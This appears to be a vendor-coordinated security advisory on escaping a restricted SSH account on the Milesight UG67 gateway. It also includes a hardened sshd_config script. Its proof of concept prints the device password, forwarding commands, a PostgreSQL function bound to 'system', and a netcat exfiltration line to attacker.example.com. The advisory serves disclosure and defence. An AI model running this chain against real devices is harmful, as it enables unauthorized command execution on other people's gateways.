
Milesight UG67: Circumvention of User Account Restrictions using SSH Port Forwarding

It is possible to gain full shell access with restricted user accounts on the Milesight UG67 LoRaWAN Gateway by abusing SSH port forwarding and the PostgreSQL server.

Details

Introduction

The Milesight UG67 is a robust LoRaWAN® gateway designed for outdoor deployments.

More Details

Attackers with SSH access to the Milesight UG67 LoRaWAN Gateway are able to circumvent the restricted menu system that is configured as the login shell for some of the accounts, because the login shell does not restrict SSH port forwarding.

Proof of Concept

The user account ‘pyuser’ only gets a restricted menu system (vtysh) as its login shell:

root@(none):/# grep pyuser /overlay/upper/etc/passwd
pyuser:x:1001:1001::/home/pyuser:/usr/sbin/vtysh
$ ssh pyuser@192.168.23.150
pyuser@192.168.23.150's password: ur123456
-- model:UG67,sn:xxxxxxxxxxxx,hwver:0140 partnumber:L04EU-868M--

-------------------------------------------------------------------------
Product Model        : UG67
Firmware Version     : 60.0.0.42-r5
-------------------------------------------------------------------------

GATEWAY>
  check          Show running system information
  clear          Reset functions
  enable         Turn on privileged mode command
  exit           Exit current mode and down to previous mode
  list           Print command list
  modbus-master
  ping           Send echo messages
  quit           Exit current mode and down to previous mode
  show           Show running system information
  ssh            Open an ssh connection
  telnet         Open a telnet connection
  terminal       Set terminal line parameters
  traceroute     Trace route to destination
  ups
GATEWAY> enable
% permission denied.

However, the restricted login shell does not limit the other features of the SSH service. The account can still request port forwards, for example a SOCKS5 dynamic forward:

$ ssh -N -D 1080 pyuser@192.168.23.150
Password: ur123456

This provides a SOCKS5 proxy on TCP port 1080 of the attacker’s system that tunnels all traffic through the Milesight UG67 LoRaWAN Gateway. This makes it possible to reach services that only listen on the gateway’s local interfaces and are not exposed externally:

$ curl --proxy socks5://localhost:1080 http://127.0.0.1:17080

Similarly, local forwards of Unix domain sockets can be used to reach sockets on the gateway, such as that of the PostgreSQL server:

$ ssh -N -L /tmp/.s.PGSQL.5432:/tmp/.s.PGSQL.5432 pyuser@192.168.23.150
Password: ur123456

This allows running the psql client locally and connecting through the forwarded socket to the gateway’s database as the database account ‘postgres’ without further authentication:

$ psql -U postgres -h /tmp -d postgres
Type "help" for help.

postgres=# \l
              List of databases
     Name      |     Owner     |[...]
---------------+---------------+[...]
 loraserver_as | loraserver_as |[...]
 loraserver_ns | loraserver_ns |[...]
 postgres      | postgres      |[...]
 [...]

(5 rows)

As the account ‘postgres’ is a superuser within the PostgreSQL database, it is possible to create C-language functions backed by an existing shared library, here binding the symbol ‘system’ through the PostgreSQL library plpgsql.so:

postgres=# CREATE OR REPLACE FUNCTION system_command(cstring) RETURNS int
           AS '/usr/lib/plpgsql.so', 'system' LANGUAGE 'c' strict;
CREATE FUNCTION

This function provides, as the chosen name suggests, the ability to execute system commands as the operating system user running the PostgreSQL server. It can be used as shown below:

postgres=# select system_command('whoami | nc attacker.example.com 1234');
 system_command
----------------
              0
(1 row)

The result could then be received on the attacker’s system, for example using netcat:

$ nc -lp 1234
postgres

Workaround

The SSH service should be disabled.

Fix

All SSH features besides TTY access, in particular TCP, Unix socket and agent forwarding, should be disabled for restricted accounts. Unnecessary accounts should be disabled or removed.
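As an added example that is not part of the advisory or of the vendor’s firmware, the following shell script shows the sshd_config Match block that implements this fix for a menu-restricted account, together with a small awk-based resolver that mimics sshd’s Match semantics so the effective per-user settings can be checked offline. The account name ‘pyuser’ is taken from the advisory; the file path, the global settings and the helper names are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the advisory): hardened sshd_config fragment for a
# menu-restricted account plus an offline check of the effective settings.
set -eu

# Assumption: write the example configuration to a temporary file.
CONF="${TMPDIR:-/tmp}/sshd_config.example"

cat > "$CONF" <<'EOF'
# --- global section: weak default, forwarding allowed for every account ---
PermitRootLogin no
AllowTcpForwarding yes
AllowStreamLocalForwarding yes
AllowAgentForwarding yes
X11Forwarding no
PermitTunnel no

# --- hardened: the restricted menu account only gets a TTY ---
Match User pyuser
    AllowTcpForwarding no
    AllowStreamLocalForwarding no
    AllowAgentForwarding no
    X11Forwarding no
    PermitTunnel no
    PermitTTY yes
EOF

# effective_setting FILE USER KEYWORD
# Prints (lowercased) the value sshd would apply for USER: the first value in a
# "Match User" block listing USER wins, otherwise the first global value,
# otherwise "default". Only "Match User" criteria are modelled here.
effective_setting() {
    awk -v user="$2" -v key="$3" '
        function lc(s) { return tolower(s) }
        BEGIN { inmatch = 0; applies = 0; gval = ""; mval = "" }
        /^[[:space:]]*(#|$)/ { next }                  # comments and blank lines
        lc($1) == "match" {                             # start of a Match block
            inmatch = 1; applies = 0
            for (i = 2; i < NF; i++)
                if (lc($i) == "user") {
                    n = split($(i + 1), users, ",")
                    for (j = 1; j <= n; j++)
                        if (users[j] == user) applies = 1
                }
            next
        }
        lc($1) != lc(key) { next }                      # some other keyword
        !inmatch && gval == "" { gval = lc($2) }        # first global value wins
        inmatch && applies && mval == "" { mval = lc($2) }  # first matching block wins
        END { print (mval != "" ? mval : (gval != "" ? gval : "default")) }
    ' "$1"
}

# forwarding_closed FILE USER
# Succeeds only if every forwarding channel is explicitly disabled for USER.
forwarding_closed() {
    for k in AllowTcpForwarding AllowStreamLocalForwarding \
             AllowAgentForwarding X11Forwarding PermitTunnel; do
        v=$(effective_setting "$1" "$2" "$k")
        [ "$v" = "no" ] || { echo "$2: $k=$v" >&2; return 1; }
    done
}

if forwarding_closed "$CONF" pyuser; then
    echo "pyuser: all forwarding disabled"
fi
forwarding_closed "$CONF" admin || echo "admin: forwarding still allowed (global setting)"
```

On the device itself, `sshd -T -C user=pyuser` (with `-f` pointing at the configuration file) is the authoritative way to print the effective settings for an account, since the resolver above only models `Match User` criteria. The login shell has no influence on forwarding requests, which is why these keywords must be set explicitly; disabling TCP and Unix socket forwarding closes both the SOCKS proxy and the PostgreSQL socket path shown in the proof of concept.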

Security Risk

Attackers with SSH access to the Milesight UG67 LoRaWAN Gateway are able to login with an undocumented password (compare rt-sa-2024-002) for the restricted user account ‘pyuser’. Using SSH port forwarding and the PostgreSQL database, the account restrictions can be circumvented in order to execute system commands. Circumvention of this shell restriction is considered to pose a high risk, due to the ability to exploit other vulnerabilities of the system.

By exploiting either of two local privilege escalation vulnerabilities (see rt-sa-2024-004 and rt-sa-2024-005) it is possible to gain root access to the Milesight UG67 LoRaWAN Gateway. It might also be possible to use the default credentials to obtain root access, if these were not changed. This requires using the busybox binary in ‘/rom/bin’, since the default login shell does not allow elevating privileges.

Timeline

  • 2024-04-25 Vulnerability identified
  • 2024-04-29 Customer approved disclosure to vendor
  • 2024-05-14 Vendor notified
  • 2024-06-28 asked Vendor for update
  • 2024-07-03 Vendor will provide Update until end of July
  • 2024-07-24 asked Vendor for update
  • 2024-07-30 Vendor stated: Work in Progress
  • 2024-08-09 Vendor stated: Fix expected Q3/24
  • 2024-09-24 CVE ID requested
  • 2024-09-24 asked Vendor for update
  • 2024-09-24 Vendor stated: Fix in 60.0.0.44
  • 2024-10-04 CVE ID assigned
  • 2024-10-07 asked Vendor for update
  • 2024-10-08 Vendor stated: Fix will be available mid-October
  • 2024-10-18 asked Vendor for update
  • 2024-10-21 Vendor stated: Fix will be available mid-November
  • 2024-11-04 Vendor released fixed version for testing
  • 2024-11-05 Vendor released fixed version
  • 2024-12-10 Customer approved public release of vulnerability details
  • 2024-12-10 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/